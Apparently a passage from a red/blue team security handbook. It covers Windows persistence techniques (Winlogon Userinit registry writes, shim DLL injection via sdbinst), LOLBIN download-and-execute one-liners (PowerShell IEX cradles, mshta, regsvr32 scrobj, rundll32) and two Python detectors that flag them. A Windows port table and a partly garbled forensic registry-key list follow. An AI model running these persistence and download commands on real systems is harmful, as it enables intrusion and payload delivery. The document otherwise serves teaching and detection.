reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "[Link], [Link]" /f
#Or PowerShell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "[Link], [Link]" -Force
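Added example (not from the handbook): the blue-team check for the two Winlogon values above. Both Shell and Userinit are comma-separated lists that Winlogon launches at every logon, and the stock values are `explorer.exe` and `C:\Windows\system32\userinit.exe,` (trailing comma included), so anything else in the list is a persistence entry. The code parses the text that `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"` prints and reports the extra entries; the two output samples are constructed, and the function names and the EXPECTED table are this example's own.

```python
import re

# Constructed `reg query` output: value lines are indented and
# whitespace-separated as NAME TYPE DATA.
CLEAN_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
"""

TAMPERED_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe, C:\Users\Public\update.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe, C:\Users\Public\helper.exe
"""

# Stock entries; compared case-insensitively after splitting on commas.
EXPECTED = {
    "Shell": {"explorer.exe"},
    "Userinit": {r"c:\windows\system32\userinit.exe"},
}


def parse_reg_query(text):
    """Turn `reg query <key>` output into {value_name: data}."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$", line)
        if m:
            values[m.group(1)] = m.group(3).strip()
    return values


def winlogon_findings(values):
    """Return [(value_name, [unexpected entries])] for Shell and Userinit.

    Entries are split on commas, stripped of whitespace and quotes and
    lower-cased; empty entries (the trailing comma of Userinit) are ignored.
    """
    findings = []
    for name, expected in EXPECTED.items():
        data = values.get(name)
        if data is None:
            continue
        entries = [e.strip().strip('"').lower() for e in data.split(",")]
        extra = [e for e in entries if e and e not in expected]
        if extra:
            findings.append((name, extra))
    return findings


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_OUTPUT), ("tampered", TAMPERED_OUTPUT)):
        found = winlogon_findings(parse_reg_query(sample))
        print(label, "->", found or "no unexpected entries")
```

Run it against `reg query` output captured from the host (or the same key under HKU\<SID> for per-user overrides); a non-empty result is the path to pull for analysis. On a domain controller Userinit is still the same single entry, so the EXPECTED table needs no change there.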

Winlogon GP Extensions
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\GPExtensions\{GUID}\DllName=<DLL>

OMA Client Provisioning [Link]


HKLM\SOFTWARE\Microsoft\PushRouter\Test\TestDllPath2=<DLL>

[Link] Reflective Debugger
#Set the ReflectDebugger value to the executable to run:
HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger=<path\to\exe>
#Launch
[Link] -pr 1

OffloadModExpo Function
HKLM\Software\Microsoft\Cryptography\Offload\ExpoOffload=<DLL>

DiskCleanup CleanupMgr
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\
cleanuppath = %SystemRoot%\System32\[Link]

Application Shim Redirect EXE
#Use Microsoft Application Compatibility Toolkit (ACT) to build a shim:
[Link]
us/windows/deployment/planning/compatibility-administrator-users-guide
#Create a shim for a known application on the target host (the .sdb
#does not have to be built on the target host). In Compatibility
#Administrator navigate to:
Create New Compatibility Fix -> RedirectEXE -> Parameters -> Command Line -> C:\path\to\local\[Link] -> OK -> Next -> Finish
#Save as shim database file (.sdb)
#Then install the shim on the target host via:
[Link] [Link]
#The .sdb file can then be deleted. sdbinst copies the database to
#%SystemRoot%\AppPatch\Custom\ and registers it under
#HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB,
#which is where defenders look for it.

Application Shim DLL Injection
#Use Microsoft Application Compatibility Toolkit (ACT) to build a shim:
[Link]
us/windows/deployment/planning/compatibility-administrator-users-guide
#Place the malicious DLL on a share reachable from the target network.
#Create a shim for a known application on the target host (the .sdb
#does not have to be built on the target host). In Compatibility
#Administrator navigate to:
Create New Compatibility Fix -> InjectDll -> Parameters -> Command Line -> \\[Link]\path\to\[Link] -> OK -> Next -> Finish
#Save as shim database file (.sdb)
#Then install the shim on the target host via:
[Link] [Link]
#The .sdb file can then be deleted.

VMware Tools BAT File Persistence
#Add command into one or more of the following:
C:\Program Files\VMware\VMware Tools\[Link]
C:\Program Files\VMware\VMware Tools\[Link]
C:\Program Files\VMware\VMware Tools\[Link]
C:\Program Files\VMware\VMware Tools\[Link]

RATTLER - Tool to identify DLL Hijacks


[Link]

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
Twitter -> @subTee

COMMAND & CONTROL

C2 Matrix
It is the golden age of Command and Control (C2) frameworks. The
goal of this site is to point you to the best C2 framework for your
needs based on your adversary emulation plan and the target
environment. Take a look at the matrix or use the questionnaire to
determine which fits your needs.
[Link]

MORE WINDOWS LOLBIN DOWNLOAD OPTIONS

POWERSHELL
[Link] -w hidden -nop -ep bypass -c "IEX ((new-object [Link]).downloadstring('[Link]'))"
#OR
powershell -exec bypass -c "(New-Object [Link]).[Link]=[[Link]]::DefaultNetworkCredentials;iwr('[Link]
#OR
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
#File written to WebDAV Local Cache

CMD
[Link] /k < \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

Cscript/Wscript
cscript //E:jscript \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

MSHTA
mshta vbscript:Close(Execute("GetObject(""script:[Link].sct"")"))
#File written to IE Local Cache

#OR
mshta \\webdavserver\folder\[Link]
#File written to WebDAV Local Cache

RUNDLL32
[Link] javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/[Link]");[Link]();
#File written to IE Local Cache

#OR
rundll32 \\webdavserver\folder\[Link],entrypoint
#File written to WebDAV Local Cache

WMIC
wmic os get /format:"[Link]"
#File written to IE Local Cache

REGSVR32
regsvr32 /u /n /s /i:[Link] [Link]
#File written to WebDAV Local Cache

#OR
regsvr32 /u /n /s /i:\\webdavserver\folder\[Link] [Link]
#File written to WebDAV Local Cache

ODBCCONF
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
#File written to WebDAV Local Cache
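Added example (not from the handbook): the detection side of the download one-liners above, run as a triage pass over Sysmon Event ID 1 (process creation) records. Each rule pairs an image name with the command-line feature that makes the one-liner work (a URL or UNC path handed to certutil, regsvr32 with scrobj.dll, msh
ta, rundll32, wmic /format:, odbcconf, a PowerShell download cradle, a script host reading from a share). The records are constructed sample data with a documentation address standing in for the attacker's server, and the rule table and function names are this example's own; the rules are deliberately broad and meant as a starting point for a SIEM query, not a tuned signature set.

```python
import re

# Constructed Sysmon Event ID 1 records (only the fields the rules use).
# 203.0.113.10 is a documentation address standing in for the attacker host.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.10/a.exe C:\Users\Public\a.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u /n /s /i:http://203.0.113.10/file.sct scrobj.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta \\203.0.113.10\dav\payload.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://203.0.113.10/p.ps1'))"'''},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\Users\alice\Desktop\driver.cat"},  # benign use
    {"EventID": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript //E:jscript \\203.0.113.10\dav\payload.txt"},
]

# (rule name, image regex, command-line regex), one per one-liner family above.
RULES = [
    ("certutil URL fetch or encode/decode", r"certutil\.exe$",
     r"(?i)-urlcache\s.*\s-f\s|\s-(en|de)code\s"),
    ("bitsadmin file transfer", r"bitsadmin\.exe$",
     r"(?i)/(addfile|transfer|setnotifycmdline)\b"),
    ("regsvr32 scriptlet", r"regsvr32\.exe$",
     r"(?i)/i:(https?://|\\\\).*scrobj\.dll"),
    ("mshta remote or inline script", r"mshta\.exe$",
     r"(?i)script:|https?://|\\\\|vbscript:|javascript:"),
    ("rundll32 script host", r"rundll32\.exe$",
     r"(?i)javascript:|RunHTMLApplication|url\.dll|\\\\"),
    ("wmic remote XSL", r"wmic\.exe$", r'(?i)/format:"?(https?://|\\\\)'),
    ("odbcconf regsvr", r"odbcconf\.exe$", r"(?i)regsvr"),
    ("powershell download cradle", r"powershell\.exe$",
     r"(?i)downloadstring|downloadfile|\biwr\b|invoke-webrequest|\\\\\S+\.ps1"),
    ("script host reading a UNC path", r"[cw]script\.exe$", r"\\\\"),
]


def triage(events):
    """Return [(rule, image, command line)] for every Event ID 1 record
    whose image and command line match one of the rules (first rule wins)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        for rule, img_re, cmd_re in RULES:
            if re.search(img_re, ev["Image"], re.I) and re.search(cmd_re, ev["CommandLine"]):
                hits.append((rule, ev["Image"], ev["CommandLine"]))
                break
    return hits


if __name__ == "__main__":
    for rule, image, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {image}\n    {cmdline}")
```

Once a hit is confirmed, the "File written to ... Local Cache" notes above say where the payload lands: the WebDAV client keeps its copies under %SystemRoot%\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV, and the IE cache lives under the user's INetCache folder, so Sysmon Event ID 11 (FileCreate) on those directories corroborates the process-creation hit.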

REFERENCE:
[Link]
remote-payload-and-execute-arbitrary-code/
[Link]
anchor
[Link]
[Link]

WINDOWS_Hardening
BLUE TEAM CONFIGURATION WINDOWS

WINDOWS HARDENING GUIDE
[Link]

WINDOWS 10 HARDENING GUIDE


[Link]
_10_hardening.md

WINDOWS_Ports
ALL INFORMATIONAL WINDOWS
Historical Windows services and ports for all versions.

DEFAULT DYNAMIC PORT RANGES:


Windows Vista and later Range= 49152-65535
Windows 2000, XP, and Server 2003 Range= 1025-5000

PORT | PROTO | APP_PROTO | SYSTEM SERVICE
7 | TCP | Echo | Simple TCP/IP Services
7 | UDP | Echo | Simple TCP/IP Services
9 | TCP | Discard | Simple TCP/IP Services
9 | UDP | Discard | Simple TCP/IP Services
13 | TCP | Daytime | Simple TCP/IP Services
13 | UDP | Daytime | Simple TCP/IP Services
17 | TCP | Quotd | Simple TCP/IP Services
17 | UDP | Quotd | Simple TCP/IP Services
19 | TCP | Chargen | Simple TCP/IP Services
19 | UDP | Chargen | Simple TCP/IP Services
20 | TCP | FTP default data | FTP Publishing Service
21 | TCP | FTP control | FTP Publishing Service
21 | TCP | FTP control | Application Layer Gateway Service
23 | TCP | Telnet | Telnet
25 | TCP | SMTP | Simple Mail Transfer Protocol
25 | TCP | SMTP | Exchange Server
42 | TCP | WINS Replication | Windows Internet Name Service
42 | UDP | WINS Replication | Windows Internet Name Service
53 | TCP | DNS | DNS Server
53 | UDP | DNS | DNS Server
67 | UDP | DHCP Server | DHCP Server
69 | UDP | TFTP | Trivial FTP Daemon Service
80 | TCP | HTTP | Windows Media Services
80 | TCP | HTTP | WinRM 1.1 and earlier
80 | TCP | HTTP | World Wide Web Publishing Service
80 | TCP | HTTP | SharePoint Portal Server
88 | TCP | Kerberos | Kerberos Key Distribution Center
88 | UDP | Kerberos | Kerberos Key Distribution Center
102 | TCP | X.400 | Microsoft Exchange MTA Stacks
110 | TCP | POP3 | Microsoft POP3 Service
110 | TCP | POP3 | Exchange Server
119 | TCP | NNTP | Network News Transfer Protocol
123 | UDP | NTP | Windows Time
123 | UDP | SNTP | Windows Time
135 | TCP | RPC | Message Queuing
135 | TCP | RPC | Remote Procedure Call
135 | TCP | RPC | Exchange Server
135 | TCP | RPC | Certificate Services
135 | TCP | RPC | Cluster Service
135 | TCP | RPC | Distributed File System Namespaces
135 | TCP | RPC | Distributed Link Tracking
135 | TCP | RPC | Distributed Transaction Coordinator
135 | TCP | RPC | Distributed File Replication Service
135 | TCP | RPC | Fax Service
135 | TCP | RPC | Microsoft Exchange Server
135 | TCP | RPC | File Replication Service
135 | TCP | RPC | Group Policy
135 | TCP | RPC | Local Security Authority
135 | TCP | RPC | Remote Storage Notification
135 | TCP | RPC | Remote Storage
135 | TCP | RPC | Systems Management Server 2.0
135 | TCP | RPC | Terminal Services Licensing
135 | TCP | RPC | Terminal Services Session Directory
137 | UDP | NetBIOS Name Resolution | Computer Browser
137 | UDP | NetBIOS Name Resolution | Server
137 | UDP | NetBIOS Name Resolution | Windows Internet Name Service
137 | UDP | NetBIOS Name Resolution | Net Logon
137 | UDP | NetBIOS Name Resolution | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | Computer Browser
138 | UDP | NetBIOS Datagram Service | Server
138 | UDP | NetBIOS Datagram Service | Net Logon
138 | UDP | NetBIOS Datagram Service | Distributed File System
138 | UDP | NetBIOS Datagram Service | Systems Management Server 2.0
138 | UDP | NetBIOS Datagram Service | License Logging Service
139 | TCP | NetBIOS Session Service | Computer Browser
139 | TCP | NetBIOS Session Service | Fax Service
139 | TCP | NetBIOS Session Service | Performance Logs and Alerts
139 | TCP | NetBIOS Session Service | Print Spooler
139 | TCP | NetBIOS Session Service | Server
139 | TCP | NetBIOS Session Service | Net Logon
139 | TCP | NetBIOS Session Service | Remote Procedure Call Locator
139 | TCP | NetBIOS Session Service | Distributed File System Namespaces
139 | TCP | NetBIOS Session Service | Systems Management Server 2.0
139 | TCP | NetBIOS Session Service | License Logging Service
143 | TCP | IMAP | Exchange Server
161 | UDP | SNMP | SNMP Service
162 | UDP | SNMP Traps Outgoing | SNMP Trap Service
389 | TCP | LDAP Server | Local Security Authority
389 | UDP | DC Locator | Local Security Authority
389 | TCP | LDAP Server | Distributed File System Namespaces
389 | UDP | DC Locator | Distributed File System Namespaces
389 | UDP | DC Locator | Netlogon
389 | UDP | DC Locator | Kerberos Key Distribution Center
389 | TCP | LDAP Server | Distributed File System Replication
389 | UDP | DC Locator | Distributed File System Replication
443 | TCP | HTTPS | HTTP SSL
443 | TCP | HTTPS | World Wide Web Publishing Service
443 | TCP | HTTPS | SharePoint Portal Server
443 | TCP | RPC over HTTPS | Exchange Server 2003
443 | TCP | HTTPS | WinRM 1.1 and earlier
445 | TCP | SMB | Fax Service
445 | TCP | SMB | Print Spooler
445 | TCP | SMB | Server
445 | TCP | SMB | Remote Procedure Call Locator
445 | TCP | SMB | Distributed File System Namespaces
445 | TCP | SMB | Distributed File System Replication
445 | TCP | SMB | License Logging Service
445 | TCP | SMB | Net Logon
464 | UDP | Kerberos Password V5 | Kerberos Key Distribution Center
464 | TCP | Kerberos Password V5 | Kerberos Key Distribution Center
500 | UDP | IPsec ISAKMP | Local Security Authority
515 | TCP | LPD | TCP/IP Print Server
554 | TCP | RTSP | Windows Media Services
563 | TCP | NNTP over SSL | Network News Transfer Protocol
593 | TCP | RPC over HTTPS endpoint mapper | Remote Procedure Call
593 | TCP | RPC over HTTPS | Exchange Server
636 | TCP | LDAP SSL | Local Security Authority
636 | UDP | LDAP SSL | Local Security Authority
647 | TCP | DHCP Failover | DHCP Failover
9389 | TCP | Active Directory Web Services | Active Directory Web Services
9389 | TCP | Active Directory Web Services | Active Directory Management Gateway Service
993 | TCP | IMAP over SSL | Exchange Server
995 | TCP | POP3 over SSL | Exchange Server
1067 | TCP | Installation Bootstrap Service | Installation Bootstrap protocol server
1068 | TCP | Installation Bootstrap Service | Installation Bootstrap protocol client
1270 | TCP | MOM-Encrypted | Microsoft Operations Manager 2000
1433 | TCP | SQL over TCP | Microsoft SQL Server
1433 | TCP | SQL over TCP | MSSQL$UDDI
1434 | UDP | SQL Probe | Microsoft SQL Server
1434 | UDP | SQL Probe | MSSQL$UDDI
1645 | UDP | Legacy RADIUS | Internet Authentication Service
1646 | UDP | Legacy RADIUS | Internet Authentication Service
1701 | UDP | L2TP | Routing and Remote Access
1723 | TCP | PPTP | Routing and Remote Access
1755 | TCP | MMS | Windows Media Services
1755 | UDP | MMS | Windows Media Services
1801 | TCP | MSMQ | Message Queuing
1801 | UDP | MSMQ | Message Queuing
1812 | UDP | RADIUS Authentication | Internet Authentication Service
1813 | UDP | RADIUS Accounting | Internet Authentication Service
1900 | UDP | SSDP | SSDP Discovery Service
2101 | TCP | MSMQ-DCs | Message Queuing
2103 | TCP | MSMQ-RPC | Message Queuing
2105 | TCP | MSMQ-RPC | Message Queuing
2107 | TCP | MSMQ-Mgmt | Message Queuing
2393 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2394 | TCP | OLAP Services 7.0 | SQL Server: Downlevel OLAP Client Support
2460 | UDP | MS Theater | Windows Media Services
2535 | UDP | MADCAP | DHCP Server
2701 | TCP | SMS Remote Control | SMS Remote Control Agent
2701 | UDP | SMS Remote Control | SMS Remote Control Agent
2702 | TCP | SMS Remote Control (data) | SMS Remote Control Agent
2702 | UDP | SMS Remote Control (data) | SMS Remote Control Agent
2703 | TCP | SMS Remote Chat | SMS Remote Control Agent
2703 | UDP | SMS Remote Chat | SMS Remote Control Agent
2704 | TCP | SMS Remote File Transfer | SMS Remote Control Agent
2704 | UDP | SMS Remote File Transfer | SMS Remote Control Agent
2725 | TCP | SQL Analysis Services | SQL Server Analysis Services
2869 | TCP | UPNP | UPnP Device Host
2869 | TCP | SSDP event notification | SSDP Discovery Service
3268 | TCP | Global Catalog | Local Security Authority
3269 | TCP | Global Catalog | Local Security Authority
3343 | UDP | Cluster Services | Cluster Service
3389 | TCP | Terminal Services | NetMeeting Remote Desktop Sharing
3389 | TCP | Terminal Services | Terminal Services
3527 | UDP | MSMQ-Ping | Message Queuing
4011 | UDP | BINL | Remote Installation
4500 | UDP | NAT-T | Local Security Authority
5000 | TCP | SSDP legacy event notification | SSDP Discovery Service
5004 | UDP | RTP | Windows Media Services
5005 | UDP | RTCP | Windows Media Services
5722 | TCP | RPC | Distributed File System Replication
6001 | TCP | Information Store | Exchange Server 2003
6002 | TCP | Directory Referral | Exchange Server 2003
6004 | TCP | DSProxy/NSPI | Exchange Server 2003
42424 | TCP | [Link] Session State | [Link] State Service
51515 | TCP | MOM-Clear | Microsoft Operations Manager 2000
5985 | TCP | HTTP | WinRM 2.0
5986 | TCP | HTTPS | WinRM 2.0
1024-65535 | TCP | RPC | Randomly allocated high TCP ports
135 | TCP | WMI | Hyper-V service
49152-65535 | TCP | Randomly allocated high TCP ports | Hyper-V service
80 | TCP | Kerberos Authentication (HTTP) | Hyper-V service
443 | TCP | Certificate-based Authentication (HTTPS) | Hyper-V service
6600 | TCP | Live Migration | Hyper-V Live Migration
445 | TCP | SMB | Hyper-V Live Migration
3343 | UDP | Cluster Service Traffic | Hyper-V Live Migration

REFERENCE:
[Link]
network-port-requirements-for-windows

WINDOWS_Registry
ALL INFORMATIONAL WINDOWS

KEY DEFINITIONS
HKCU: HKEY_CURRENT_USER keys are settings specific to a user and only
apply to the currently logged-on user. Each user gets their own user
key to store their unique settings.

HKU: HKEY_USERS keys are settings that apply to all users; every loaded
user hive is maintained under this key, and HKU\<SID> is equal to that
user's HKCU. Set auditing on the appropriate key(s) for the logged-in
user (HKCU) or for other users by <SID>.

HKLM: HKEY_LOCAL_MACHINE keys are where settings for the machine or
system that apply to everyone and everything are stored.

Common Windows registry locations and settings.

DESCRIPTION | OS (XP V 7 8 10) | KEY
$MFT Zone Definition | XP 7 8 10 | SYSTEM\ControlSet###\Control\FileSystem / NtfsMftZoneReservation
64 Bit Shim Cache | 7 | HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache
AccessData FTK Time Zone Cache | - | [Link]\Software\AccessData\Products\Forensic Toolkit\\Settings\TimeZoneCache
AccessData Registry Viewer Recent File List | - | [Link]\Software\Accessdata\Registry Viewer\Recent File List
Acro Software CutePDF | - | [Link]\Software\Acro Software Inc\CPW
Adobe | - | [Link]\Software\Adobe\
Adobe Acrobat | - | [Link]\Software\Adobe\Acrobat Reader\AVGeneral\cRecentFiles\c#
Adobe Photoshop Last Folder | - | [Link]\Software\Adobe\Photoshop\\VisitedDirs
Adobe Photoshop MRUs | - | [Link]\Software\Adobe\MediaBrowser\MRU\Photoshop\FileList\
AIM | - | [Link]\Software\America Online\AOL InstantMessenger\CurrentVersion\Users\username
AIM | - | [Link]\Software\America Online\AOL Instant Messenger\CurrentVersion\Users
AIM Away Messages | - | [Link]\Software\America Online\AOL Instant Messenger(TM)\CurrentVersion\Users\screen name\IAmGoneList

373
[Link]\Software\America
Online\AOL Instant
AIM File Transfers & Messenger\ CurrentVersion\Use
Sharing rs\screen name\ Xfer
[Link]\Software\America
Online\AOL Instant Messenger
(TM)\ CurrentVersion\Login -
AIM Last User Screen Name
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\Use
AIM Profile Info rs\screen name\DirEntry
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\use
rs\ username\ recent IM
AIM Recent Contacts ScreenNames
[Link]\Software\America
Online\AOL Instant
Messenger\ CurrentVersion\Use
AIM Saved Buddy List rs\username\Config Transport
All UsrClass data in 1
HKCR hive 7 8 0 HKCR\Local Settings
[Link]\Software\America
Online\AOL Instant
Messenger(TM)\CurrentVersion\
AOL 8 Messenger Away Users\[screen
Messages 7 name]\IAmGoneList
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Buddy Messenger\CurrentVersion\User
List 7 s\username\Config Transport
[Link]\Software\America
Online\AOL Instant Messenger
(TM)\Current
AOL 8 Messenger File Version\Users\[screen
Transfers 7 name]\Xfer
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Messenger\CurrentVersion\User
Information 7 s\username
[Link]\Software\America
Online\AOL Instant Messenger
AOL 8 Messenger Last (TM)\CurrentVersion\[Login -
User 7 Screen Name]
[Link]\Software\America
Online\AOL Instant Messenger
AOL 8 Messenger (TM)\CurrentVersion\Users\[sc
Profile Info 7 reen name]\DirEntry

374
[Link]\Software\America
Online\AOL Instant
Messenger\CurrentVersion\user
AOL 8 Messenger s\username\[recent IM
Recent Contact 7 ScreenNames]
[Link]\Software\America
Online\AOL Instant
AOL 8 Messenger Messenger\CurrentVersion\User
Registered User 7 s
[Link]\LocalSettings\So
ftware\Microsoft\Windows\Curr
entVersion\AppModel\Repositor
y\Packages\[Link]
tedge\[Link]
_20.10240.16384.0_neutral
8wekyb3d8b
1 bwe\MicrosoftEdge\Capabilitie
App Information 0 s\FileAssociations
[Link]\LocalSettings\So
ftware\Microsoft\Windows\Curr
entVersion\AppModel\Repositor
y\Families\[Link]
tedge_8wekyb3d8bbwe\Microsoft
.MicrosoftEdge_20.10240.16384
1 .0_neut ral 8wekyb3d8bbwe /
App Install Date/Time 0 InstallTime
[Link]\Local
Settings\Software\ Microsoft\
Windows\CurrentVersion\ AppMo
1 del\Repository\Families\\/
App Install Date/Time 8 0 InstallTime
Application X 1 [Link]\Software\%Applicat
Information P 7 8 0 ion Name%
[Link]\Software\Microsoft
Application Last \Windows\CurrentVersion\Explo
Accessed 7 rer\UserAssist\
[Link]\Software\Microsoft
Application MRU Last \Windows\CurrentVersion\Explo
Visited 7 rer\ComDlg32\
[Link]\Software\Microsoft
Application MRU Open \Windows\CurrentVersion\Explo
Saved 7 rer\ComDlg32\OpenSaveMRU
[Link]\Software\Microsoft
Application MRU \Windows\CurrentVersion\Explo
Recent Document 7 rer\RecentDocs
1
AppX App Values 8 0 [Link]\
Auto Run Programs [Link]\Software\Microsoft
List 7 \Windows\CurrentVersion\Run

375
[Link]\Software\Microsoft
\ Windows\ CurrentVersion\Exp
Autorun USBs, CDs, X 1 lorer\ AutoplayHandlers /
DVDs P 7 8 0 DisableAutoplay
Background Activity SYSTEM\CurrentControlSet\Serv
Moderator ices\bam\UserSettings\{SID}
Background Activity SYSTEM\CurrentControlSet\Serv
Moderator ices\dam\UserSettings\{SID
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{C8FF2A06-638A-
BitComet Agent 1 7 4913-8403-50294CFF6608}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Typelib\{2D2C1FBD-
BitComet Agent 1.0 7 624D-4789-9AE0-F4B66F9EE6E2}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\AppID\{B99B5DF3-3AD2-
BitComet Agent 2 7 463F-8F8C-86787623E1D5}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\AppID\{00980C9D-751F-
BitComet BHO 7 4A5F-B6CE-6D81998264FD}
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{A8DC7D60-AD8F-
BitComet DL Manager 7 491E-9A84-8FF901E7556E}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{A8DC7D60-AD8F-
BitComet DM Class 7 491E-9A84-8FF901E7556E}
HKEY_CURRENT_USER\(SID)\Softw
BitComet File Types 7 are\Classes\.bc!\: "BitComet"
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
on\Explorer\Browser Helper
Objects\{39F7E362-828A-4B5A-
BCAF-5B79BFDFEA60}\:
BitComet GUID 7 "BitComet ClickCapture
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\CLSID\{39F7E362-828A-
BitComet Helper 7 4B5A-BCAF-5B79BFDFEA60}
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{39F7E362-828A-
BitComet Helper 7 4B5A-BCAF-5B79BFDFEA60}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{E8A058D1-
BitComet IBcAgent 7 C830-437F-A029-10D777A8DD40}
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{6CFA2528-
BitComet IDownloadMan 7 2725-491D-8E0D-E67AB5C5A17A}

376
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Internet
BitComet IE DL Manage 7 Explorer\Extensions
HKEY_USERS\(SID)\Software\Mic
rosoft\Windows\CurrentVersion
\Ext\Stats\{D18A0B52-D63C-
BitComet IE Extension 7 4ED0-AFC6-C1E3DC1AF43A}
HKEY_USERS\(SID)\Software\Mic
rosoft\InternetExplorer\Down-
loadUI: "{A8DC7D60-AD8F-491E-
BitComet IE Link 1 7 9A84-8FF901E7556E}
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\InternetExplorer\Dow
nloadUI:"{A8DC7D60-AD8F-491E-
BitComet IE Link 2 7 9A84-8FF901E7556E}"
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Interface\{F08F65A5-
BitComet IIEClickCapt 7 7F91-45D7-A119-12AC4AB3D229}
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
BitComet Inst. Path 7 on\AppPaths\[Link]
HKEY_LOCAL_MACHINE\SOFTWARE\C
lasses\Typelib\{66A8414F-
BitComet Installation 7 F2E4-4766-BE09-8F72CDDACED4}
BitLocker Drive
Encryption Driver X 1 SYSTEM\ControlSet001\services
Service P 7 8 0 \ fvevol\Enum
[Link]\Software\Microsoft
\Windows\CurrentVersion\FveAu
BitLocker To Go 7 toUnlock\
[Link]\Software\Microsoft
X 1 \ Windows\CurrentVersion\ Fve
BitLocker To Go P 7 8 0 AutoUnlock\
HKEY_LOCAL_MACHINE\SOFTWARE\M
icrosoft\Windows\CurrentVersi
on\Uninstall\(BitTorrent
BitTorrent Clients 7 Client Name)
HKEY_USERS\(SID)\Software\Mic
rosoft\WindowsNT\CurrentVersi
on\AppCompatFlags\Compatibili
BitTorrent Compatabil 7 ty Assistant\Persisted\
HKEY_USERS\(SID)\Software
\Classes\Magnet\shell\open\co
mmsnd\:""C:\Program
Files\(BitTorrent Client
Name)\(BitTorrent Client
BitTorrent Mag Links 7 Executable [Link])" "%1""
HKEY_USERS\(SID)\Software\Mic
BitTorrent MRUList 7 rosoft\Windows\CurrentVersion

377
\Explorer\FileExts\.torrent\O
penWithList
BitTorrent Recent | 7 | HKEY_USERS\(SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.torrent
BitTorrent Reg Values | 7 | HKEY_LOCAL_MACHINE\SOFTWARE\Classes
BitTorrent Tracing 1 | 7 | HKEY_LOCAL_MACHINE\(SID)\SOFTWARE\Microsoft\Tracing\(BitTorrent Client Name)_RASMANCS
BitTorrent Tracing 2 | 7 | HKEY_LOCAL_MACHINE\(SID)\SOFTWARE\Microsoft\Tracing\(BitTorrent Client Name)_RASAPI32
Cached Passwords | 7 | SECURITY\Policy\Secrets\DefaultPassword / [CurrVal and OldVal]
Camera App | 10 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.jpg&ls=0&b=0
Camera Mounting | 7 8 10 | SYSTEM\ControlSet001\Enum\USB\
CD Burning | 7 8 | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives\Volume\Current Media
CD Burning | XP | [Link]\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Current Media / Disc Label
CDROM Enumeration Service | XP 7 8 10 | SYSTEM\ControlSet001\services\cdrom\Enum
Class GUID for HDD Drivers | XP 7 8 10 | SYSTEM\ControlSet001\Control\Class\{4D36E967-E325-11CE-BFC1-08002BE10318}
